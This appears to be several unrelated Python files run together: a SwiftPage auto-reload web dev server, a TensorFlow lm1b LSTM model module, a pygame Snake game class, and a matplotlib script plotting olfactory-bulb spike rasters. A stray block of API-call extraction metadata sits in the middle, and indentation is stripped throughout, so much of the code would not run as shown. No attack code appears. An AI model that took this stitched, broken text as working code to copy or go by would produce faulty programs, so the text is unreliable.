import os
import time
import webbrowser
import threading
from addons.addons_server import *
from page import *
import http.server
import socketserver
last_modified_time = 0
dev_page_prefix = '''
<html>
<title>SwiftPage Development Server</title>
<script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script>
<script>
var lastRefreshToken = "none";
function loadCommands(filename) {
$.get(filename, function(data, textStatus) {
if (textStatus == 'success') {
var lines = data.match(/^.*(('''
dev_page_middle = '\\'+'r'+'\\'+'n'+'|'+'\\'+'n'+'|'+'\\'+'r'
dev_page_suffix = ''')|$)/gm)
for (var i = 0; i < lines.length; i++) {
//console.log(lines[i]); // TODO: remove
if (lines[i] !== '' && lines[i] !== ' ') {
if (lastRefreshToken !== lines[i]) {
lastRefreshToken = lines[i];
var iframe = document.getElementsByName('content_window')[0];
iframe.src = iframe.src
iframe.contentWindow.location.reload(true);
//iframe.location.reload(true);
}
}
}
} else {
console.log('Commands file does not exist.');
}
});
}
function checkForCommands() {
var filename = '.swiftpage_commands';
loadCommands(filename);
}
setInterval(checkForCommands, 30);
</script>
<body style='padding: 0px; margin: 0px;'>
<iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe>
</body>
</html>
'''
dev_page = dev_page_prefix+dev_page_middle+dev_page_suffix
addons_server = AddonsServer(page)
def main_loop():
while True:
global last_modified_time
# checks to see if files have been updated
modified_time = os.path.getmtime("page.py")
# if necessary, saves new copy of swiftpage
if last_modified_time != modified_time:
last_modified_time = modified_time
os.system('python create_page.py')
print("Page modified, new SwiftPage generated: "+str(last_modified_time))
# refreshes web browser and writes other commands
commands = open(".swiftpage_commands","w")
commands.write(str(last_modified_time))
commands.close()
else:
# empties commands
commands = open(".swiftpage_commands","w")
commands.write("")
commands.close()
time.sleep(0.6)
def addons_loop():
global addons_server
addons_server.on_update()
# removes existing commands file (if one is left over from a previous run)
if os.path.exists(".swiftpage_commands"):
    os.remove(".swiftpage_commands")
# creates dev_server.html
dev_server_page = open("dev_server.html","w")
dev_server_page.write(dev_page)
dev_server_page.close()
# defines custom HTTP handler
class customHandler(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
return
# starts web server
port = 8080
handler = customHandler # http.server.SimpleHTTPRequestHandler
t1 = threading.Thread(target=main_loop)
t2 = threading.Thread(target=addons_loop)
with socketserver.TCPServer(("", port), handler) as httpd:
# opens web browser of local server
webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True)
print("SwiftPage server running, your site will now be automatically regenerated when changes are made")
# starts loops
t1.start()
t2.start()
# serves html server
httpd.serve_forever()
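# The JavaScript poller embedded in dev_page above watches ".swiftpage_commands"
# and reloads the iframe whenever the token written by main_loop() changes. For
# reference, a rough Python equivalent of that polling loop is sketched below.
# It is commented out (serve_forever() above never returns) and assumes the dev
# server is running on port 8080; it is purely illustrative.
#
#   import time
#   import urllib.request
#   last_token = "none"
#   while True:
#       token = urllib.request.urlopen(
#           "http://127.0.0.1:8080/.swiftpage_commands").read().decode().strip()
#       if token and token != last_token:
#           last_token = token
#           print("SwiftPage regenerated, refresh the browser")
#       time.sleep(0.5)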
# todo: add dropout to trainer
# todo: add GPU support to trainer
# todo: reset lstm hidden state for inference
# todo: cleanup batch_sizing inconsistencies
import tensorflow as tf
import re
import os
import lm1b.model.char_embedding_nodes as char_embedding_nodes
from lm1b.utils.util import merge
from lm1b.utils.model import sharded_linear, create_sharded_weights
NUM_SHARDS = 8
def _attach_cached_lstm_nodes(input, hparams=None):
"""
LSTM with cached / preserved hidden state
see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html
see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns
:param input: tensor of word embeddings
:param hparams:
:return: lstm output and state
"""
# LSTM with cached / preserved hidden state
# https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html
cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size,
num_proj=hparams.word_embedding_size,
num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS,
forget_bias=1.0, use_peepholes=True)
state_c = tf.get_variable(name="state_c",
shape=(hparams.batch_size * hparams.sequence_length, 8192),
initializer=tf.zeros_initializer,
trainable=False)
state_h = tf.get_variable(name="state_h",
shape=(hparams.batch_size * hparams.sequence_length, 1024),
initializer=tf.zeros_initializer,
trainable=False)
out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h))
ass_c = tf.assign(state_c, state_0[0])
ass_h = tf.assign(state_h, state_0[1])
with tf.control_dependencies([ass_c, ass_h]):
out_0 = tf.identity(out_0)
return out_0, state_0
def _attach_projection_nodes(input, hparams=None):
"""
Project LSTM outputs to sparse vectors / word predictions
:param input: lstm outputs
:param hparams:
:return: tensor shaped [?,vocab_size]
"""
softmax_w = create_sharded_weights((hparams.vocab_size // NUM_SHARDS, hparams.word_embedding_size),
num_shards=NUM_SHARDS,
concat_dim=1)
softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size))
softmax_b = tf.get_variable('b', shape=(hparams.vocab_size))
logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format="NHWC")
softmax = tf.nn.softmax(logits)
return logits, softmax
def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None):
"""
:param logits:
:param targets:
:param target_weights:
:param hparams:
:return:
"""
target_list = tf.reshape(targets, [-1])
target_weights_list = tf.to_float(tf.reshape(target_weights, [-1]))
# hrmm
word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738)
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list)
cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights))
return {"log_perplexity": tf.reduce_sum(cross_entropy) / word_count,
"cross_entropy": cross_entropy}
CHAR_EMBEDDING_SCOPE = "char_embedding"
LSTM_SCOPE_PREFIX = "lstm/lstm_"
SOFTMAX_SCOPE = "softmax"
def attach_inference_nodes(input_seqs, hparams=None):
"""
Predict next word for each sequence / timestep in input_seqs
:param input_seqs: tensor of character encoded words
:param hparams:
:return: dict of inference nodes
"""
with tf.variable_scope(CHAR_EMBEDDING_SCOPE):
word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS,
hparams=hparams)
word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size))
cell_out = word_embeddings
cell_state_all_layers = []
cell_out_all_layers = []
for layer_num in range(0, 2):
with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)):
cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams)
cell_state_all_layers.append(cell_state)
cell_out_all_layers.append(cell_out)
lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size))
with tf.variable_scope(SOFTMAX_SCOPE):
logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams)
return {
"word_embeddings": word_embeddings,
"lstm_outputs": lstm_outputs,
"lstm_state": cell_state,
"logits": logits,
"softmax": softmax,
"cell_state_all_layers": cell_state_all_layers,
"cell_out_all_layers": cell_out_all_layers
}
def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None):
"""
Helper to pull out the most likely words
:param logits:
:param id_to_word_lookup_table:
:param k:
:param hparams:
:return:
"""
top_k = tf.nn.top_k(logits, k)
top_word_ids = top_k.indices
word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k])
return {"predicted_words": word_predictions,
"top_k": top_k}
def attach_training_nodes(loss, hparams=None):
"""
Attach nodes for training. Work in progress...
:param loss:
:param hparams:
:return:
"""
trainable_vars = tf.trainable_variables()
tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope="")
tf.global_variables()
all_gradients = tf.gradients(loss, trainable_vars)
# materialise the filter so it can be consumed more than once under Python 3
lstm_gradients = list(filter(lambda x: -1 < x.op.name.find("lstm"), all_gradients))
non_lstm_gradients = set(all_gradients).difference(lstm_gradients)
lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm)
all_gradients = non_lstm_gradients.union(lstm_gradients)
optimizer = tf.train.AdagradOptimizer(hparams.learning_rate)
global_step = tf.Variable(0, name='global_step', trainable=False)
train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step)
return {"train_op": train_op, "global_step": global_step}
def restore_original_lm1b(sess, run_config):
"""
Var mapping shenanigans to restore the pre-trained model to the current graph
:param sess:
:param run_config:
:return:
"""
def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars):
var_map = {}
# Map char embedding vars
var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars)))
# Map lstm embedding vars
var_map_regexes = {r"^(" + LSTM_SCOPE_PREFIX + "\d)/lstm_cell/projection/kernel/part_(\d).*": r"\1/W_P_\2",
r"^(" + LSTM_SCOPE_PREFIX + "\d)/lstm_cell/kernel/part_(\d).*": r"\1/W_\2",
r"^(" + LSTM_SCOPE_PREFIX + "\d)/lstm_cell/bias.*": r"\1/B",
r"^(" + LSTM_SCOPE_PREFIX + "\d)/lstm_cell/w_([fio])_diag.*":
lambda match: match.group(1) + "/W_" + match.group(
2).upper() + "_diag",
}
for r_match, r_replace in var_map_regexes.items():
matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars)
for v in matching_variables:
var_map[re.sub(r_match, r_replace, v.name)] = v
# Map softmax embedding vars
var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars)))
return var_map
var_map = create_lm1b_restoration_var_map(
char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE),
lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX),
softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE)
)
saver = tf.train.Saver(var_list=var_map)
saver.restore(sess, os.path.join(run_config['model_dir_path_original'], "ckpt-*"))
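# Rough intended call order for the helpers above (sketch only; "hparams",
# "run_config" and the id-to-word lookup table are assumed to come from the
# surrounding training/eval scripts and are not defined in this module):
#
#   input_seqs = ...  # tensor of character-encoded words fed to the model
#   nodes = attach_inference_nodes(input_seqs, hparams=hparams)
#   preds = attach_predicted_word_nodes(nodes["logits"], id_to_word_lookup_table,
#                                       k=5, hparams=hparams)
#   with tf.Session() as sess:
#       restore_original_lm1b(sess, run_config)
#       sess.run(preds["predicted_words"], feed_dict={...})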
import pygame, sys
import time
from pygame.math import Vector2
from .config import FPS, xSize, ySize, cell_size, cell_number, CUTTING
from .eatable.saw import Saw
from .eatable.cake import Cake
class Snake(object):
is_moving = False
def __init__(self, screen: pygame.Surface) -> None:
self.load_snake_texture()
self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)]
self.pyScreen = screen
self.direction = Vector2(1,0)
self.new_block = False
self.slowed = False
def draw_snake_object(self) -> None:
for index, block in enumerate(self.body):
# rect for positioning
x_pos = int(block.x * cell_size)
y_pos = int(block.y * cell_size)
block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size)
# what direction is the face
if index == 0:
self.pyScreen.blit(self.head,block_rect)
elif index == len(self.body) - 1:
self.pyScreen.blit(self.tail,block_rect)
else:
previous_block = self.body[index + 1] - block
next_block = self.body[index - 1] - block
if previous_block.x == next_block.x:
self.pyScreen.blit(self.body_vertical, block_rect)
elif previous_block.y == next_block.y:
self.pyScreen.blit(self.body_horizontal, block_rect)
else:
if previous_block.x == -1 and next_block.y == -1 or previous_block.y == -1 and next_block.x == -1:
self.pyScreen.blit(self.body_tl, block_rect)
elif previous_block.x == -1 and next_block.y == 1 or previous_block.y == 1 and next_block.x == -1:
self.pyScreen.blit(self.body_bl, block_rect)
elif previous_block.x == 1 and next_block.y == -1 or previous_block.y == -1 and next_block.x == 1:
self.pyScreen.blit(self.body_tr, block_rect)
elif previous_block.x == 1 and next_block.y == 1 or previous_block.y == 1 and next_block.x == 1:
self.pyScreen.blit(self.body_br, block_rect)
def draw_snake(self) -> None:
# Update Snake-Model
self.update_head_graphics()
self.update_tail_graphics()
self.draw_snake_object()
def update_tail_graphics(self) -> None:
tail_relation = self.body[-2] - self.body[-1]
if tail_relation == Vector2(-1,0): self.tail = self.tail_left
elif tail_relation == Vector2(1,0): self.tail = self.tail_right
elif tail_relation == Vector2(0,-1): self.tail = self.tail_up
elif tail_relation == Vector2(0,1): self.tail = self.tail_down
def update_head_graphics(self) -> None:
head_relation = self.body[1] - self.body[0]
if head_relation == Vector2(-1,0): self.head = self.head_left
elif head_relation == Vector2(1,0): self.head = self.head_right
elif head_relation == Vector2(0,-1): self.head = self.head_up
elif head_relation == Vector2(0,1): self.head = self.head_down
def move_snake(self) -> None:
if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1):
if self.new_block == True:
body_copy = self.body[:]
body_copy.insert(0, body_copy[0] + self.direction)
self.body = body_copy[:]
if Cake.eated_the_cake():
if Cake.get_cake_countdown() != 0:
Cake.decrase_cake_countdown()
else:
Cake.remove_cake()
self.new_block = False
else:
self.new_block = False
else:
body_copy = self.body[:-1]
body_copy.insert(0, body_copy[0] + self.direction)
self.body = body_copy[:]
else:
self.new_block = False
body_copy = self.body[:CUTTING]
body_copy.insert(0, body_copy[0] + self.direction)
self.body = body_copy[:]
Saw.cutting_done()
Snake.is_moving = False
def set_direction(self, vec: Vector2) -> None:
#Snake.is_moving = True
self.direction = vec
def add_block(self) -> None:
self.new_block = True
def load_snake_texture(self) -> None:
# Kopf
self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png')
self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png')
self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png')
self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png')
# Schwanz
self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png')
self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png')
self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png')
self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png')
# Körper
self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png')
self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png')
# Directions
self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png')
self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png')
self.body_br = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_unten.png')
self.body_bl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_unten.png')
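# Minimal usage sketch (this helper is hypothetical and not part of the game
# loop): it assumes pygame is initialised, a display surface exists and the
# textures under assets/Schlange/ are present, since Snake.__init__ loads them
# immediately.
def _demo_snake_frame(screen: pygame.Surface) -> Snake:
    """Create a snake, step it one cell to the right and draw it onto screen."""
    snake = Snake(screen)
    snake.set_direction(Vector2(1, 0))
    snake.move_snake()
    snake.draw_snake()
    return snake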
"pygame.image.load",
"pygame.math.Vector2",
"pygame.Rect"
] | [((453, 466), 'pygame.math.Vector2', 'Vector2', (['(1)', '(0)'], {}), '(1, 0)\n', (460, 466), False, 'from pygame.math import Vector2\n'), ((4531, 4590), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Kopf_oben.png"""'], {}), "('assets/Schlange/Schlange_Kopf_oben.png')\n", (4548, 4590), False, 'import pygame, sys\n'), ((4617, 4678), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Kopf_rechts.png"""'], {}), "('assets/Schlange/Schlange_Kopf_rechts.png')\n", (4634, 4678), False, 'import pygame, sys\n'), ((4704, 4764), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Kopf_links.png"""'], {}), "('assets/Schlange/Schlange_Kopf_links.png')\n", (4721, 4764), False, 'import pygame, sys\n'), ((4790, 4850), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Kopf_unten.png"""'], {}), "('assets/Schlange/Schlange_Kopf_unten.png')\n", (4807, 4850), False, 'import pygame, sys\n'), ((4893, 4955), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Schwanz_oben.png"""'], {}), "('assets/Schlange/Schlange_Schwanz_oben.png')\n", (4910, 4955), False, 'import pygame, sys\n'), ((4981, 5044), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Schwanz_unten.png"""'], {}), "('assets/Schlange/Schlange_Schwanz_unten.png')\n", (4998, 5044), False, 'import pygame, sys\n'), ((5071, 5135), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Schwanz_rechts.png"""'], {}), "('assets/Schlange/Schlange_Schwanz_rechts.png')\n", (5088, 5135), False, 'import pygame, sys\n'), ((5161, 5224), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Schwanz_links.png"""'], {}), "('assets/Schlange/Schlange_Schwanz_links.png')\n", (5178, 5224), False, 'import pygame, sys\n'), ((5272, 5330), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_vertikal.png"""'], {}), "('assets/Schlange/Schlange_vertikal.png')\n", (5289, 5330), False, 'import pygame, sys\n'), ((5362, 5422), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_horizontal.png"""'], {}), "('assets/Schlange/Schlange_horizontal.png')\n", (5379, 5422), False, 'import pygame, sys\n'), ((5468, 5534), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Ecke_rechts_oben.png"""'], {}), "('assets/Schlange/Schlange_Ecke_rechts_oben.png')\n", (5485, 5534), False, 'import pygame, sys\n'), ((5558, 5623), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Ecke_links_oben.png"""'], {}), "('assets/Schlange/Schlange_Ecke_links_oben.png')\n", (5575, 5623), False, 'import pygame, sys\n'), ((5647, 5714), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Ecke_rechts_unten.png"""'], {}), "('assets/Schlange/Schlange_Ecke_rechts_unten.png')\n", (5664, 5714), False, 'import pygame, sys\n'), ((5738, 5804), 'pygame.image.load', 'pygame.image.load', (['"""assets/Schlange/Schlange_Ecke_links_unten.png"""'], {}), "('assets/Schlange/Schlange_Ecke_links_unten.png')\n", (5755, 5804), False, 'import pygame, sys\n'), ((354, 368), 'pygame.math.Vector2', 'Vector2', (['(5)', '(10)'], {}), '(5, 10)\n', (361, 368), False, 'from pygame.math import Vector2\n'), ((368, 382), 'pygame.math.Vector2', 'Vector2', (['(4)', '(10)'], {}), '(4, 10)\n', (375, 382), False, 'from pygame.math import Vector2\n'), ((382, 396), 'pygame.math.Vector2', 'Vector2', (['(3)', '(10)'], {}), '(3, 10)\n', (389, 396), False, 'from pygame.math import 
Vector2\n'), ((768, 815), 'pygame.Rect', 'pygame.Rect', (['x_pos', 'y_pos', 'cell_size', 'cell_size'], {}), '(x_pos, y_pos, cell_size, cell_size)\n', (779, 815), False, 'import pygame, sys\n'), ((2521, 2535), 'pygame.math.Vector2', 'Vector2', (['(-1)', '(0)'], {}), '(-1, 0)\n', (2528, 2535), False, 'from pygame.math import Vector2\n'), ((2911, 2925), 'pygame.math.Vector2', 'Vector2', (['(-1)', '(0)'], {}), '(-1, 0)\n', (2918, 2925), False, 'from pygame.math import Vector2\n'), ((2593, 2606), 'pygame.math.Vector2', 'Vector2', (['(1)', '(0)'], {}), '(1, 0)\n', (2600, 2606), False, 'from pygame.math import Vector2\n'), ((2983, 2996), 'pygame.math.Vector2', 'Vector2', (['(1)', '(0)'], {}), '(1, 0)\n', (2990, 2996), False, 'from pygame.math import Vector2\n'), ((2665, 2679), 'pygame.math.Vector2', 'Vector2', (['(0)', '(-1)'], {}), '(0, -1)\n', (2672, 2679), False, 'from pygame.math import Vector2\n'), ((3055, 3069), 'pygame.math.Vector2', 'Vector2', (['(0)', '(-1)'], {}), '(0, -1)\n', (3062, 3069), False, 'from pygame.math import Vector2\n'), ((2735, 2748), 'pygame.math.Vector2', 'Vector2', (['(0)', '(1)'], {}), '(0, 1)\n', (2742, 2748), False, 'from pygame.math import Vector2\n'), ((3125, 3138), 'pygame.math.Vector2', 'Vector2', (['(0)', '(1)'], {}), '(0, 1)\n', (3132, 3138), False, 'from pygame.math import Vector2\n')] |
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 6 18:22:04 2011
@author: -
"""
import os
import numpy
from matplotlib import pyplot
from neuronpy.graphics import spikeplot
from bulbspikes import *
from neuronpy.util import spiketrain
from params import sim_var
homedir = os.path.join(os.path.relpath('..'))
analysis_path = homedir
def format_axes(ax, dt=1, ylim=(0.,4.)):
#ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.))
#ax.set_xticklabels(['$-\pi$','$-\pi/2$','$0$','$\pi/2$','$\pi$'], fontsize=18)
xlim = ax.get_xlim()
timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.)
ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5))
ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int))
ax.set_xlabel('lag (ms)')
ax.set_ylim(ylim)
ax.set_ylabel('Synchronization magnitude')
def draw_cell(cellid, ax, color='black'):
xloc = 10+cellid*20
# Lateral dends
y = numpy.abs(numpy.subtract(range(101), xloc))
yvec = numpy.log(numpy.add(y,1))
ax.plot(range(101), yvec, color=color)
# Soma
ax.fill_between(range(101), numpy.ones(101), yvec, \
where=numpy.ma.masked_where(yvec < 1., yvec).mask, \
color=color, linewidth=0.)
# Glom
ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color)
ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25)
ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2)
# Primary dendrite
ax.plot([xloc, xloc], [0,8], color=color, linewidth=2)
format_schematic_axis(ax)
def draw_weights(cellids, ax, color='black',scale=1.):
"""Draw granule cells"""
import synweightsnapshot
sws = synweightsnapshot.SynWeightSnapshot( \
nummit=sim_var['num_mitral'], \
numgran=sim_var['num_granule'])
raw=sws.read_file(sim_var['wt_input_file'],
os.path.join(homedir, sim_var['weight_dir']))
sws.parse_data(raw)
for cellid in cellids:
wts = sws.m2g[cellid,:,0]
wts = wts/numpy.max(wts)
for i in range(len(wts)):
if wts[i] > 0.0001:
cellloc = 10+cellid*20
y = numpy.abs(i - cellloc)
yloc = numpy.log(numpy.add(y,1))
gloc = -3.5+((i%2)*1.5)
ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color)
ax.plot([i,i],[yloc, gloc], color=color)
ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color)
format_schematic_axis(ax)
def format_schematic_axis(ax):
ax.set_xlim((0,100))
xticks = [10,30,50,70,90]
ax.set_xticks(xticks)
ax.set_xticklabels(numpy.multiply(xticks,10))
ax.set_xlabel('distance in microns')
ax.set_ylim((-5,11))
ax.spines['left'].set_color('none')
ax.spines['right'].set_color('none')
ax.set_yticks([])
ax.spines['top'].set_color('none')
ax.spines['bottom'].set_color('black')
ax.xaxis.set_ticks_position('bottom')
def read_weightevents():
M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt'))
data = []
for i in range(5):
data.append([])
for m in M:
data[int(m[0])].append(m[1])
return data
def read_delayevents():
M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt'))
data = []
for i in range(5):
data.append([])
for m in M:
data[int(m[0])].append(m[1])
return data
def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)):
# pos1 = (10+pair[0]*20, cluster_width, 1, pair)
# pos2 = (10+pair[1]*20, cluster_width, 1, pair)
# stim_odor_mags = numpy.ones(5)*.55
fig = pyplot.figure(figsize=(9.5,5.7))
raster_ax = fig.add_axes([.1,.1,.8,.27])
schematic_ax = fig.add_axes([.1,.85,.8,.1])
syn_ax = fig.add_axes([.1,.45,.8,.225])
draw_cell(pair[0], schematic_ax, color='red')
draw_cell(pair[1], schematic_ax, color='blue')
draw_weights(pair, schematic_ax, color='black')
# Analyze an output file in some_dir
bulb_spikes = BulbSpikes(sim_time=sim_var['tstop'])
bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk'))
breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt'))
wts = read_weightevents()
delays = read_delayevents()
dt = 1
tstop = xlim[1]
x = numpy.arange(0,tstop,dt)
y0 = numpy.zeros(int(tstop/dt))
y1 = numpy.zeros(int(tstop/dt))
EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \
numpy.multiply(x,-1./20.))
idx = 0
for b in breath_events:
if b >= tstop:
break
else:
dtidx = int((b+delays[pair[0]][idx])/dt)
y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx]
dtidx = int((b+delays[pair[1]][idx])/dt)
y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx]
idx += 1
redplt = syn_ax.plot(x,y0, color='red')
blueplt = syn_ax.plot(x,y1, color='blue')
for breath in breath_events:
breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \
color='gray', linewidth=2)
syn_ax.set_xlim(xlim)
syn_ax.set_ylim(0,1.6)
syn_ax.set_yticks([])
syn_ax.set_xticks([])
syn_ax.set_ylabel('EPSC onto tuft')
leg = syn_ax.legend([breathplt, redplt, blueplt], \
['sniff event', 'input onto red', 'input onto blue'], \
bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode="expand", \
borderaxespad=0., handletextpad=.2)
# Mark sniff interval
for i in range(len(breath_events)):
if breath_events[i] > xlim[0]:
span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data',
xytext=(breath_events[i+1], .28), \
textcoords='data', \
arrowprops=dict(arrowstyle="|-|", linewidth=2)
)
syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \
'sniff every\n150 - 250 ms', \
horizontalalignment='center', verticalalignment='top', \
backgroundcolor='white')
break
# Mark amplitude interval
span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data',
xytext=(1190, 1.12), \
textcoords='data', \
arrowprops=dict(arrowstyle="|-|", linewidth=2)
)
syn_ax.text(1215, 1.21, \
'+/- 5%', \
horizontalalignment='left', verticalalignment='center')
# Mark delay interval
for i in range(len(breath_events)):
if breath_events[i] > 1400:
span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data',
xytext=(breath_events[i]+17, .5), \
textcoords='data', \
arrowprops=dict(arrowstyle="|-|", linewidth=2)
)
syn_ax.text(breath_events[i]+7.5, .28, \
'delay 0-15 ms', \
horizontalalignment='center', verticalalignment='top', \
backgroundcolor='white')
break
spikes = bulb_spikes.get_mitral_spikes()
ref=spikes[pair[0]]
comp=spikes[pair[1]]
gcspikes = bulb_spikes.get_granule_spikes()
mididx = 10+pair[0]*20
gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1]
mididx = 10+pair[1]*20
gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1]
sp = spikeplot.SpikePlot(fig=fig, savefig=False)
sp.set_markercolor('blue')
sp.set_markeredgewidth(2.)
sp.set_markerscale(4)
sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \
draw=False )
sp.set_markercolor('red')
sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \
draw=False)
sp.set_markerscale(1.3)
sp.set_markeredgewidth(1.5)
sp.set_markercolor('blue')
sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \
draw=False)
sp.set_markercolor('red')
sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \
draw=False)
coincidences, mask_a, mask_b, ratio = \
spiketrain.get_sync_traits(ref, comp, window=5)
# idx = 0
# for i in mask_a:
# if i == 1:
# raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red')
# idx += 1
idx = 0
for i in mask_b:
if i == 1:
if comp[idx] >= xlim[0] and comp[idx] < xlim[1]:
raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \
color='purple', fontweight='bold', \
horizontalalignment='center', verticalalignment='center')
#raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue')
idx += 1
raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \
horizontalalignment='center', verticalalignment='center',
fontsize=11)
raster_ax.set_yticks([])
ylim = (0.5, cluster_width*2+7.5)
for breath in breath_events:
raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2)
sp.update_xlim(xlim)
raster_ax.set_ylim(ylim)
raster_ax.set_xlabel('time (ms)')
raster_ax.set_ylabel('spike output\n granule mitral\n\n', horizontalalignment='center')
pos = schematic_ax.get_position()
schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure,
verticalalignment='baseline')
pos = syn_ax.get_position()
syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure,
verticalalignment='baseline')
pos = raster_ax.get_position()
raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure,
verticalalignment='baseline')
# fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0], pair[1], fi))
fig.savefig(os.path.join(analysis_path, 'fig1.pdf'))
raster()
